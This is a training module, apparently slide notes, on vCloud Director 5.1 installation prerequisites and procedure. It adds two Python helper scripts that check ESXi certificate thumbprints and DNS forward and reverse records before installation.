Importance (Slide 11-3)

VMware vCloud® is a complex system that has many interconnected components. A proper installation of VMware® vCloud Director® requires that all of these components be installed and configured correctly.

Making the correct choices during installation can help save you time and improve scalability and performance.

Module Lessons (Slide 11-4)

• Lesson 1: Installation Prerequisites
• Lesson 2: Installation Procedure

Lesson 1: Installation Prerequisites (Slide 11-5)

Learner Objectives (Slide 11-6)

By the end of this lesson, you should be able to meet the following objective:
• Describe the prerequisites for vCloud Director installation

Configuration Requirements (Slide 11-7)

VMware® vCloud Director® has several specific configuration requirements that must be configured in VMware vSphere®. Most of these can be summarized as follows:
• Resources in the resource cluster should be shared and distributed (networks and storage).
• VMware® vCenter Server™ systems should be set to automated configurations (automated VMware vSphere® Distributed Resource Scheduler™, automated VMware vSphere® Storage DRS™).
• All systems in the resource cluster should be preconfigured with verified security. vCenter Server systems must trust their VMware® ESXi™ hosts.

• VMware® vCenter Server networks intended for use as vCloud Director external networks or network pools must be available to all hosts in any cluster intended for vCloud Director to use.
• vSphere distributed switches must be used for cross-host fencing and network pool allocation.
• vCenter Server clusters used with vCloud Director must be configured to use automated VMware vSphere® Distributed Resource Scheduler.
• vCenter Server systems must trust their VMware® ESX® or VMware® ESXi hosts.
• All hosts in all clusters managed by vCloud Director must be configured to require verified host certificates.
• You must determine, compare, and select matching thumbprints for all hosts.
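Verified host certificates come down to recording each host's thumbprint and checking the value the host presents against that record. The Python below is an added example, not course material or VMware code: it computes the SHA-1 thumbprint in the colon-separated form vSphere displays, compares it against an inventory, and reports mismatches and unreachable hosts. `fetch_der` is a real TLS fetch for use against reachable hosts; the sample run substitutes constructed byte strings for real DER certificates, and the host names are constructed.

```python
"""Check ESXi host certificate thumbprints against an expected inventory.

Added example, not course material or VMware code. thumbprint() produces the
SHA-1 value in the colon-separated form vSphere displays; fetch_der() pulls
the leaf certificate from a live host; audit() compares the inventory against
what each host presents. The sample run uses constructed byte strings in
place of real DER certificates and constructed host names.
"""
import hashlib
import socket
import ssl
from typing import Callable, Dict, List, Tuple

HEX = set("0123456789ABCDEF")


def normalize(tp: str) -> str:
    """Accept 'ab:cd:..', 'ABCD..' or a pasted value with spaces; return 'AB:CD:..'."""
    hexonly = tp.replace(":", "").replace(" ", "").upper()
    if len(hexonly) != 40 or not set(hexonly) <= HEX:
        raise ValueError(f"not a SHA-1 thumbprint: {tp!r}")
    return ":".join(hexonly[i:i + 2] for i in range(0, 40, 2))


def thumbprint(der: bytes) -> str:
    """SHA-1 over the DER encoding, which is what vSphere shows as the host thumbprint."""
    return normalize(hashlib.sha1(der).hexdigest())


def fetch_der(host: str, port: int = 443, timeout: float = 5.0) -> bytes:
    """Fetch the certificate a host presents. Validation is disabled on purpose:
    the thumbprint is being recorded or compared, the host is not trusted yet."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def audit(expected: Dict[str, str],
          fetch: Callable[[str], bytes] = fetch_der) -> Dict[str, Tuple[str, str, str]]:
    """Return {host: (expected thumbprint, observed thumbprint, verdict)}.
    Verdict is 'match', 'MISMATCH' or 'UNREACHABLE (<error>)'."""
    results: Dict[str, Tuple[str, str, str]] = {}
    for host, recorded in expected.items():
        want = normalize(recorded)
        try:
            got = thumbprint(fetch(host))
        except OSError as err:
            results[host] = (want, "", f"UNREACHABLE ({type(err).__name__})")
            continue
        results[host] = (want, got, "match" if got == want else "MISMATCH")
    return results


def problem_hosts(results: Dict[str, Tuple[str, str, str]]) -> List[str]:
    """Hosts that should not be added to a vCloud Director cluster until resolved."""
    return sorted(h for h, (_, _, verdict) in results.items() if verdict != "match")


# --- constructed sample: fake DER blobs and a partly stale inventory ---
FAKE_CERTS = {
    "esxi-01.example.com": b"constructed DER bytes for esxi-01",
    "esxi-02.example.com": b"constructed DER bytes for esxi-02",
}


def fake_fetch(host: str) -> bytes:
    if host not in FAKE_CERTS:
        raise ConnectionRefusedError(f"{host}: no sample certificate")
    return FAKE_CERTS[host]


INVENTORY = {
    # recorded correctly, pasted without colons and in lower case
    "esxi-01.example.com": hashlib.sha1(FAKE_CERTS["esxi-01.example.com"]).hexdigest(),
    # stale record: the host was re-imaged and now presents a different certificate
    "esxi-02.example.com": "00:" * 19 + "00",
    # not reachable in the sample
    "esxi-03.example.com": "11" * 20,
}

if __name__ == "__main__":
    for host, (want, got, verdict) in audit(INVENTORY, fake_fetch).items():
        print(f"{host}: {verdict}")
```

Against real hosts, call `audit(INVENTORY)` with the default fetch; a MISMATCH means the thumbprint you would be asked to accept in vCenter Server is not the one on record and should be explained (re-imaged host, replaced certificate) before it is selected.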

vSphere Licensing Requirements (Slide 11-8)

vCloud Director requires that you have at least two major vSphere licenses. These licenses include vSphere DRS, licensed by VMware vSphere® Enterprise Edition™ and VMware vSphere® Enterprise Plus Edition™, and VMware vSphere® Distributed Switch™ and dvFilter, licensed by vSphere Enterprise Plus. These licenses enable the creation and use of vCloud Director isolated networks.

vCloud Director requires the use of VMware® vShield Manager™ servers in some compatible form. These must be properly licensed. In vCloud Director 5.1 this will normally be VMware vCloud® Networking and Security™. A basic license for vCloud Networking and Security is included with vCloud Director 5.1, but it does not include advanced features.

• vCloud Director requires the following vSphere licenses:
  • vSphere DRS, licensed by VMware vSphere® Enterprise Edition and VMware vSphere® Enterprise Plus Edition
  • VMware vSphere® Distributed Switch and dvFilter, licensed by vSphere Enterprise Plus. (This license enables creation and use of vCloud Director isolated networks.)
• vCloud Director requires the use of VMware® vShield Manager servers in some compatible form. These servers must be properly licensed.
• The license for VMware vCloud® Networking and Security that is included with vCloud Director does not include such features as SSL VPN and load balancing.
• For virtual private network (VPN) and load balancing, vCloud Director requires the fully licensed VMware vCloud® Networking and Security Advanced Edition license.

VMware Product Interoperability Matrixes (Slide 11-9)

VMware® strongly recommends that vCenter Server 5.1 and ESXi 5.1 be used with vCloud Director 5.1. Although earlier versions are supported, some features will not be available if these earlier versions are used.

Stateless ESXi hosts were introduced in vSphere 5.0. These are fully supported with vCloud Director 5.1. Customers should avoid stateless designs that require a host-specific configuration when the host is going to be used in a VMware vCloud® resource cluster.

For current information about supported products, see VMware Product Interoperability Matrixes at http://partnerweb.vmware.com/comp_guide/sim/interop_matrix.php

• Supported vCenter Server versions
• Supported ESX/ESXi versions
  • ESXi 5.x is required for fast provisioning and hardware version 8. ESXi 5.5 is required for hardware version 10.
  • Stateless ESXi is supported.
• Supported vCloud Networking and Security or supported vShield Manager versions
  • New vCloud Director installations should use VMware vCloud® Networking and Security App for vShield functionality.

vCloud Director Operating System and Server (Slide 11-11)

vCloud Director must be installed on a Linux system. The following operating systems are supported by vCloud Director:
• CentOS 6, Update 4
• Red Hat Enterprise Linux 5 (64-bit), Update 4-9
• Red Hat Enterprise Linux 6 (64-bit), Update 1-4

The Linux server that vCloud Director is installed on must meet the following minimum disk and memory requirements:
• 1350 MB free disk space for installation and log files
• 1 GB of RAM:
  • 2 GB of RAM is recommended.

Creating Databases and SSL Certificates Before Installation (Slide 11-12)

The database that will be used by vCloud Director must be created before installing the first vCloud Director cell. Specific requirements exist for database configuration and for the rights and privileges that the user ID of the vCloud Director service will use to access the database. Make sure your database administrator reads the section on configuring the database in the VMware vCloud Director Installation and Configuration Guide.

Before installation of vCloud Director, you must install security certificates. This installation should be done after you have confirmed that your network configuration is correct (including DNS) and that you have the correct version of the Java Runtime Environment. You must use the JRE keytool command to create your certificate requests.

You can use either self-signed security certificates or certificates that have been issued by an external certificate authority (CA).

Before installing vCloud Director, you must have the following information:
• Location and password of the SSL keystore file
• Password for each SSL certificate
• Host name or IP address of the database server
• Database instance (Microsoft SQL Server) or database service name (Oracle)
• Database name and connection port
• Database user credentials:
  • Specific database user privileges are required. See Installing and Configuring a vCloud Director Database in the VMware vCloud Director Installation and Upgrade Guide.

vCloud Director Network Requirements (1) (Slide 11-13)

• The vCloud Director cell server must have two network interfaces on the production network:
  • One TCP/IP address for console connections
  • One TCP/IP address for HTTP service
• IP aliases or multiple network interfaces:
  • Linux ip addr add does not work.
• Network Time Service:
  • Use NTP to synchronize all vCloud Director servers and their database server.
  • The maximum allowable drift is two seconds.
  • All vCloud Director servers, including the database server, must be configured to be in the same time zone.

vCloud Director Network Requirements (2) (Slide 11-14)

• Host name resolution:
  • All host names specified during vCloud Director installation must be resolvable by DNS:
    • Forward and reverse lookup
    • Fully qualified domain name
    • Unqualified host name
  • Use the nslookup command to confirm with the vCloud Director server.
• Examples for mycloud.example.com, with a console IP address of 192.168.1.1 and an HTTPS address of 192.168.1.2:
  nslookup mycloud
  nslookup mycloud.example.com
  nslookup 192.168.1.1
  nslookup 192.168.1.2


vCloud Director Network Requirements (3) (Slide 11-15)

Transfer server storage is used as temporary storage for uploads and downloads:

• NFS or other shared storage must be accessible to all vCloud Director servers in a vCloud Director cluster.
• The volume must have write permission for root.
• It must be mounted at $VCLOUD_HOME/data/transfer
  - A single vCloud Director server uses /opt/vmware/vcloud-director/data/transfer by default.
• Uploads and downloads occupy this storage for up to 24 hours.
• Transferred images can be large.
• The recommended size of the storage is several hundred gigabytes.


vCloud Director Network Security Requirements (Slide 11-16)

Connections to the vCloud Director server from the Internet and from public networks must be tightly controlled. The only port that is recommended to be open to the Internet and public networks is 443 (HTTPS). This port should be open only if you are using a public cloud model and plan to have external customers access the vCloud Director console from public or Internet-connected systems.

• Do not connect vCloud Director servers directly to the public Internet.
• Always protect vCloud Director servers with a firewall.
• A vCloud Director server should have only port 443 (HTTPS) open for incoming connections from the Internet or other public networks.
• (Optional) You can open port 22 (SSH) and port 80 (HTTP) to public networks if necessary, but these open ports are not recommended.


vCloud Director Network Ports (Slide 11-17)

On internal networks, only a few other ports should be open on vCloud Director servers. Port 443 is not listed here because it was mentioned earlier. Port 443 should also be open on internal networks to allow local administrators to connect to the vCloud Director administration console.

See VMware knowledge base article 1030816 at http://kb.vmware.com/kb/1030816.


Review of Learner Objectives (Slide 11-18)

You should be able to meet the following objective:

• Describe the prerequisites for vCloud Director installation


Lesson 2: Installation Procedure (Slide 11-19)


Recommended Installation Procedure (Slide 11-21)

1. Prepare the resource group.
2. Configure the database.
3. Configure DNS.
4. Confirm networking configuration.
5. Confirm vCloud Director server software configuration.
6. Create and install security certificates.
7. Configure vShield Manager.
8. Install vCloud Director.
9. Create the Sysprep deployment package.
10. Configure vCloud Director cells.


Preparing the Resource Group (Slide 11-22)

• Install and configure one or more vSphere DRS/vSphere HA clusters.
  - The best practice is to dedicate vSphere DRS/vSphere HA clusters in the resource group for use by vCloud Director.
• Colocate the physical equipment of all resource group vSphere DRS/vSphere HA clusters in the same geographical site.
  - Colocating prevents cloud performance problems caused by network time lags.
• Each provider virtual datacenter must have one vSphere DRS/vSphere HA cluster.
• Resource pools should not be present in the vSphere DRS/vSphere HA cluster.
• Use best practices when configuring networks: separate management, VMware vSphere® vMotion®, storage, and production traffic.
• Configure network redundancy for VMware vSphere® High Availability.
• Make management networks accessible to the vCloud Director servers.
• Group storage into storage tiers of comparable speed and cost.


Configuring DNS (Slide 11-23)

The DNS configuration is critical for vCloud Director. All server names specified during vCloud Director installation must be resolvable by DNS, including names assigned to the HTTP service network interface and the console service network interface. Both the short name and the fully qualified domain name (FQDN) must be resolvable. Reverse lookup of the addresses assigned must also be configured into the DNS server. Use the nslookup command to confirm that DNS name resolution is working for both host names and reverse IP addresses.

As mentioned in the prerequisites lesson, the DNS server must be configured with both A and PTR records for the vCloud Director network interfaces before the installation of vCloud Director.

The DNS server that vCloud Director uses should have records preconfigured. These records include the following:

• Host records (A) preconfigured for both the vCloud Director HTTP and the vCloud Director console proxy network connections
• Reverse address lookup records preconfigured for both the vCloud Director HTTP and the vCloud Director console proxy network connections

VMware recommends that other frequently used addresses be preconfigured:

• vCenter Server host name and address
• ESX/ESXi host name and address
• Names and addresses for other servers such as database server, LDAP server, vCloud Networking and Security server, and so on


Confirming Networking Configuration (Slide 11-24)

After you have configured your DNS server and have created the two required network interfaces on the vCloud Director server, you should confirm that your networking configuration is correct. Use the nslookup command to make sure you can resolve all of the names and IP addresses from a console or terminal window on the vCloud Director server. Also use ping or other tools to confirm that the vCloud Director server has network connectivity to the following:

• Database server
• vCenter Server systems
• vShield Manager servers
• NTP servers
• Any other systems that will be used, such as LDAP

Before installation, you should confirm that the vCloud Director network configuration is correct:

• Two addresses on the management network:
  - One for HTTPS
  - One for console proxy
• DNS name resolution of both vCloud Director addresses and any other address name resolution that is required during installation
• Network connectivity to the vCenter Server systems and the ESX/ESXi hosts in the resource clusters
• Network connectivity to the database server
• Network connectivity to the vShield Manager server
• Network connectivity to NTP servers
• Network connectivity to other servers, such as LDAP and Syslog
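The nslookup checks from the prerequisites slide and the DNS confirmation steps above (A and PTR records for both cell addresses, FQDN and unqualified name) can be scripted as a preflight check. The following is an added example, not course material or VMware code; the resolver callables, the helper names and the sample zone for mycloud.example.com are assumptions so the logic can run offline, and by default it asks the host resolver exactly as nslookup would.

```python
import socket
from typing import Callable, Dict, List
# Added example, not course material: preflight check for the DNS prerequisite.
# Each cell address (console proxy and HTTPS) needs an A record under the cell's
# name and a matching PTR record, and the unqualified name must resolve as well.

def system_forward(name: str) -> List[str]:
    try:  # equivalent of "nslookup <name>"; [] when the name does not resolve
        return sorted({r[4][0] for r in socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return []

def system_reverse(address: str) -> str:
    try:  # equivalent of "nslookup <address>"; "" when no PTR record exists
        return socket.gethostbyaddr(address)[0]
    except (socket.herror, socket.gaierror):
        return ""

def check_cell_dns(fqdn: str, interfaces: Dict[str, str],
                   forward: Callable[[str], List[str]] = system_forward,
                   reverse: Callable[[str], str] = system_reverse) -> List[str]:
    """Return the problems found; [] means the cell meets the prerequisite. interfaces maps a role ("console" or "https") to its address."""
    problems: List[str] = []
    short_name = fqdn.split(".")[0]
    fqdn_addrs, short_addrs = forward(fqdn), forward(short_name)
    if not fqdn_addrs:
        problems.append(f"no A record for {fqdn}")
    if not short_addrs:
        problems.append(f"unqualified name {short_name} does not resolve")
    elif set(short_addrs) != set(fqdn_addrs):
        problems.append(f"{short_name} and {fqdn} resolve to different addresses")
    for role, addr in interfaces.items():
        if addr not in fqdn_addrs:
            problems.append(f"{role} address {addr} has no A record under {fqdn}")
        ptr = reverse(addr)
        if not ptr:
            problems.append(f"no PTR record for {role} address {addr}")
        elif ptr.rstrip(".").lower() != fqdn.lower():
            problems.append(f"PTR for {addr} is {ptr}, expected {fqdn}")
    return problems

# Constructed zone data mirroring the slide's example (not real DNS records).
SAMPLE_A = {"mycloud.example.com": ["192.168.1.1", "192.168.1.2"],
            "mycloud": ["192.168.1.1", "192.168.1.2"]}
SAMPLE_PTR = {"192.168.1.1": "mycloud.example.com", "192.168.1.2": "mycloud.example.com"}
SAMPLE_CELL = {"console": "192.168.1.1", "https": "192.168.1.2"}

def check_sample(ptr_records: Dict[str, str] = SAMPLE_PTR) -> List[str]:
    return check_cell_dns("mycloud.example.com", SAMPLE_CELL,
                          lambda n: SAMPLE_A.get(n, []), lambda a: ptr_records.get(a, ""))
```

Passing a PTR table with an entry removed to check_sample reproduces the most common misconfiguration, a forward record without its reverse record, which the cell installer would otherwise surface only at install time.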


Creating the Microsoft Sysprep Deployment Package (Slide 11-25)

vCloud Director uses Microsoft Sysprep packages to customize VMware vSphere® vApps™ during vApp deployment. You should load the Microsoft Sysprep software on your vCloud Director server before creating the packages. You must use the directory names specified in the table below for each Sysprep package. You do not have to have all of the Sysprep packages if you do not plan to deploy all of these Windows operating systems in vApps.

The Sysprep software must be loaded into the proper directory on the vCloud Director server before it can be used. If you have a multicell environment, you must have this software on each cell.

• vCloud Director uses Microsoft Sysprep packages to customize VMware vSphere® vApps during vApp deployment.
• You must download these packages from Microsoft to your vCloud Director server.
• Packages must be stored in /opt/vmware/vcloud-director/guestcustomization/default/windows/sysprep.
• Create subdirectories as listed and load the Sysprep contents.
• Ensure that all Sysprep files are readable by the vcloud.vcloud user.

Guest OS               Directory Name
Windows 2003 (32-bit)  ../sysprep/svr2003
Windows 2003 (64-bit)  ../sysprep/svr2003-64
Windows XP (32-bit)    ../sysprep/xp
Windows XP (64-bit)    ../sysprep/xp-64


Installing Other Components (Slide 11-26)

• See VMware vCloud Director Installation and Upgrade Guide before and during installation of vCloud Director and all collateral components.
• Determine which additional components should be installed and how to install each.
  - An example is vCloud Director Networking and Security.
• Identify additional preinstallation steps:
  - Create and configure the vCloud Director database.
  - Examples are creating and installing security certificates.
• Formulate an installation strategy appropriate for your cloud environment.


Lab 17: Installing VMware vCloud Director (Slide 11-27)

• Install vCloud Director


Review of Learner Objectives (Slide 11-28)

You should be able to meet the following objective:

• Use the proper procedure to install vCloud Director


Key Points (Slide 11-29)

To complete the installation of vCloud Director, you must do the following:

• Meet required prerequisites.
• Understand the relationship of the interconnected systems.
• Use the proper installation procedure.

Questions?
